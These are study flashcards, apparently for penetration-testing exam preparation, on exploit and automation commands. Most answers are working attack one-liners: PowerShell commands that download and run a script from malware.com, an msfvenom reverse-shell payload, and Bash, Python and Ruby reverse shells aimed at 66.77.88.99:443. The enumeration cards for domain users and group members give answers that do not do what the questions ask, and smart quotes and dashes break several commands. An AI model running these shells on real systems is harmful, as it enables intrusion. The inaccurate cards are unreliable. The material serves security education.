5.2 Tools & code analysis: Exploits and Automation Flashcards

1
Q

Exploits to Download Files: using the PowerShell, what is the command to download and run a script

A

powershell.exe -c “IEX((New-Object System.Net.WebClient). DownloadString(‘https://malware.com/badstuff.ps1’))”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
2
Q

Exploits to Download Files: using the PowerShell, what is the command to download a file

A

powershell.exe -c “(New-Object System.Net.WebClient). DownloadFile(“https://malware.com/badstuff.zip”, “C:\Windows\Temp\downloaded.zip”)”

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
3
Q

Exploits to Download Files: using the Python, what is the code to download a file

A

import requests url = ‘https://malware.com/badstuff.zip’ r = requests.get(url, allow_redirects=True) open(‘downloaded.zip’, ‘wb’).write(r.content)

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
4
Q

Exploits for Remote Access: explain how to generate a PowerShell reverse shell using Metasploit

A

msfvenom -p cmd/windows/reverse_powershell lhost=66.77.88.99 lport=443 > script.ps1

msfvenom: This is the command-line utility within the Metasploit Framework used for generating payloads.

-p cmd/windows/reverse_powershell: This specifies the payload to be generated. In this case, it’s a reverse PowerShell shell payload for Windows. A reverse shell is a type of shell where the target machine initiates the connection back to the attacker’s machine, allowing the attacker to gain control over the target.

lhost=66.77.88.99: This sets the IP address of the listener (the attacker’s machine) to 66.77.88.99. This is the IP address to which the target machine will connect when the reverse shell payload is executed.

lport=443: This sets the port number for the listener to 443. This is the port on the attacker’s machine where the reverse shell connection will be established.

script.ps1: This redirects the output of the msfvenom command to a file named “script.ps1”. The generated PowerShell reverse shell payload will be saved in this file.

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
5
Q

Exploits for Remote Access: explain how to generate a reverse shell using Bash (Linux Reverse Shell)

A

bash -i >& /dev/tcp/66.77.88.99/443 0>&1

  • “bash -i”: This starts an interactive Bash shell.
  • ”>& /dev/tcp/66.77.88.99/443”: This redirects both standard output and standard error to the specified network address and port. In this case, it’s sending the output to IP address 66.77.88.99 on port 443.
  • “0>&1”: This redirects the standard input to the standard output, effectively sending the input from the network connection back to the output.
How well did you know this?
1
Not at all
2
3
4
5
Perfectly
6
Q

Exploits for Remote Access: explain how to generate a reverse shell using Python (Linux Reverse Shell)

A

export RHOST=“66.77.88.99”;
export RPORT=443;
python -c ‘import socket,os,pty; s=socket.socket(); s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”))));
[os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(“/bin/sh”)’

1/ export RHOST=“66.77.88.99”; export RPORT=443;: These two commands set environment variables RHOST and RPORT to the specified IP address and port number. These variables will be used later in the Python command.

2/ python -c ‘import socket,os,pty; s=socket.socket(); s.connect((os.getenv(“RHOST”),int(os.getenv(“RPORT”)))); [os.dup2(s.fileno(),fd) for fd in (0,1,2)]; pty.spawn(“/bin/sh”)’: This Python one-liner does the following:
- Imports the necessary modules: socket, os, and pty.
- Creates a new socket ‘s’.
- Connects the socket to the IP address and port specified by the environment variables RHOST and RPORT.
- Duplicates the file descriptors (0 for stdin, 1 for stdout, and 2 for stderr) to the socket using os.dup2.
Spawns a shell (/bin/sh) using pty.spawn

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
7
Q

Exploits for Remote Access: explain how to generate a reverse shell using Ruby (Linux Reverse Shell and Windows Reverse Shell)

A

o Ruby (Linux Reverse Shell):
ruby -rsocket –e’f=TCPSocket.open(“66.77.88.99”,443).to_i; exec sprintf(“/bin/sh -i <&%d >&%d 2>&%d”,f,f,f)’

o Ruby (Windows Reverse Shell)
ruby -rsocket -e ‘c=TCPSocket.new(“66.77.88.99”,“443”); while(cmd=c.gets);IO.popen(cmd,“r”){|io|c.print io.read}end’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
8
Q

Exploits for Enumerating Users: explain how to list all users in a domain using PowerShell

A

Import-Module ActiveDirectory;
Get-ADUser -Identity <username> -properties *</username>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
9
Q

Exploits for Enumerating Users: explain how to list all users in a group using PowerShell

A

Import-Module ActiveDirectory; Get-ADPrincipalGroupMembership <username> | select Administrator</username>

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
10
Q

Exploits for Enumerating Users: explain how to list all users on a system using Bash (2)

A

cat /etc/passwd

awk –F’:‘ ’{ print $1}’ /etc/passwd

How well did you know this?
1
Not at all
2
3
4
5
Perfectly
11
Q

Exploits for Enumerating Users: explain how to list all logged users using Bash

A

who | awk ‘{print $1}’ | sort | uniq | tr ‘\n’ ‘ ’

How well did you know this?
1
Not at all
2
3
4
5
Perfectly